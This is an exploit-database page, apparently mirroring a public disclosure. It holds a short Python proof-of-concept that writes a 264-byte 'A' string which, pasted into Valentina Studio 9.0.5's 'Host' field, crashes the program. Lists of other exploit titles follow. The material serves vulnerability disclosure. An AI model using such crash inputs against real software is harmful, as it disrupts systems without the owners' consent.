Menu

Search for hundreds of thousands of exploits

"Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)"

Author

"Alejandra Sánchez"

Platform

linux

Release date

2019-02-21

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
# -*- coding: utf-8 -*-
# Exploit Title: Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)
# Date: 20/02/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://valentina-db.com/en/
# Software Link: https://www.valentina-db.com/en/all-downloads/vstudio/current/vstudio_x64_lin-deb?format=raw
# Version: 9.0.5
# Tested on: Linux kali amd64

# Proof of Concept:
# 1.- Run the python script "vstudio.py", it will create a new file "vstudio.txt"
# 2.- Copy the text from the generated vstudio.txt file to clipboard
# 3.- Open VStudio
# 4.- Go to File > Connect to...
# 5.- Click on Valentina Server or SQLite Server
# 6.- Paste clipboard in 'Host' field
# 7.- Click on button -> Connect
# 8.- Crashed

buffer = "\x41" * 264
f = open ("vstudio.txt", "w")
f.write(buffer)
f.close()
Release Date Title Type Platform Author
2019-08-19 "Webmin 1.920 - Remote Code Execution" webapps linux "Fernando A. Lagos B"
2019-08-14 "ABC2MTEX 1.6.1 - Command Line Stack Overflow" dos linux "Carter Yagemann"
2019-08-12 "Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)" remote linux AkkuS
2019-08-12 "Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution" local linux "Etienne Lacoche"
2019-08-12 "Linux - Use-After-Free Reads in show_numa_stats()" dos linux "Google Security Research"
2019-07-30 "Redis 4.x / 5.x - Unauthenticated Code Execution (Metasploit)" remote linux Metasploit
2018-12-29 "Linux Kernel 4.4.0-21 < 4.4.0-51 (Ubuntu 14.04/16.04 x86-64) - 'AF_PACKET' Race Condition Privilege Escalation" local linux bcoles
2018-12-29 "Linux Kernel < 4.4.0/ < 4.8.0 (Ubuntu 14.04/16.04 / Linux Mint 17/18 / Zorin) - Local Privilege Escalation (KASLR / SMEP)" local linux bcoles
2018-12-29 "Linux Kernel 4.8.0-34 < 4.8.0-45 (Ubuntu / Linux Mint) - Packet Socket Local Privilege Escalation" local linux bcoles
2019-01-04 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (polkit Method)" local linux bcoles
2018-11-21 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (ldpreload Method)" local linux bcoles
2019-01-04 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (dbus Method)" local linux bcoles
2018-11-21 "Linux Kernel 4.15.x < 4.19.2 - 'map_write() CAP_SYS_ADMIN' Local Privilege Escalation (cron Method)" local linux bcoles
2019-07-24 "Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation" local linux bcoles
2019-07-26 "pdfresurrect 0.15 - Buffer Overflow" dos linux j0lama
2019-07-22 "Axway SecureTransport 5 - Unauthenticated XML Injection" webapps linux "Dominik Penner"
2019-07-22 "Comtrend-AR-5310 - Restricted Shell Escape" local linux "AMRI Amine"
2019-07-19 "Docker - Container Escape" local linux dominikczarnotatob
2019-07-22 "BACnet Stack 0.8.6 - Denial of Service" dos linux mmorillo
2019-07-19 "Web Ofisi Firma 13 - 'oz' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Rent a Car 3 - 'klima' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Firma Rehberi 1 - 'il' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Emlak 3 - 'emlak_durumu' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Emlak 2 - 'ara' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi Platinum E-Ticaret 5 - 'q' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "Web Ofisi E-Ticaret 3 - 'a' SQL Injection" webapps linux "Ahmet Ümit BAYRAM"
2019-07-19 "fuelCMS 1.4.1 - Remote Code Execution" webapps linux 0xd0ff9
2019-07-18 "WordPress Plugin OneSignal 1.17.5 - 'subdomain' Persistent Cross-Site Scripting" webapps linux LiquidWorm
2019-07-17 "Oracle Siebel CRM 19.0 - Persistent Cross-Site Scripting" webapps linux "Sarath Nair"
2019-07-17 "Linux - Broken Permission and Object Lifetime Handling for PTRACE_TRACEME" local linux "Google Security Research"
Release Date Title Type Platform Author
2019-05-27 "Pidgin 2.13.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-23 "Terminal Services Manager 3.2.1 - Denial of Service" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Share Name' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-23 "NetAware 1.20 - 'Add Block' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-22 "BlueStacks 4.80.0.1060 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "docPrint Pro 8.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "PCL Converter 2.7 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-20 "Encrypt PDF 2.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-15 "Tomabo MP4 Converter 3.25.22 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-17 "CEWE Photo Importer 6.4.3 - '.jpg' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-17 "CEWE Photoshow 6.4.3 - 'Password' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-17 "Sandboxie 5.30 - 'Programs Alerts' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-14 "TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-14 "TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-14 "TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-14 "Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-10 "SpotPaltalk 1.1.5 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-10 "SpotIM 2.2 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-09 "Convert Video jetAudio 8.1.7 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-09 "Lyric Maker 2.0.1.0 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-05-09 "Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-04-16 "PCHelpWare V2 1.0.0.5 - 'Group' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-04-16 "PCHelpWare V2 1.0.0.5 - 'SC' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-04-04 "Magic ISO Maker 5.5(build 281) - 'Serial Code' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-28 "TransMac 12.3 - Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-21 "Memu Play 6.0.7 - Privilege Escalation" local windows "Alejandra Sánchez"
2019-02-21 "Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)" dos linux "Alejandra Sánchez"
2019-02-18 "NBMonitor 1.6.5.0 - 'Key' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-02-18 "Realterm Serial Terminal 2.0.0.70 - Local Buffer Overflow (SEH)" dos windows "Alejandra Sánchez"
2019-02-18 "Realterm Serial Terminal 2.0.0.70 - Denial of Service" dos windows "Alejandra Sánchez"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46439/?format=json')
                        {"url": "https://www.nmmapper.com/api/exploitdetails/46439/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46439/40888/valentina-studio-905-linux-host-buffer-overflow-poc/download/", "exploit_id": "46439", "exploit_description": "\"Valentina Studio 9.0.5 Linux - 'Host' Buffer Overflow (PoC)\"", "exploit_date": "2019-02-21", "exploit_author": "\"Alejandra S\u00e1nchez\"", "exploit_type": "dos", "exploit_platform": "linux", "exploit_port": null}
                    

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Browse exploit APIBrowse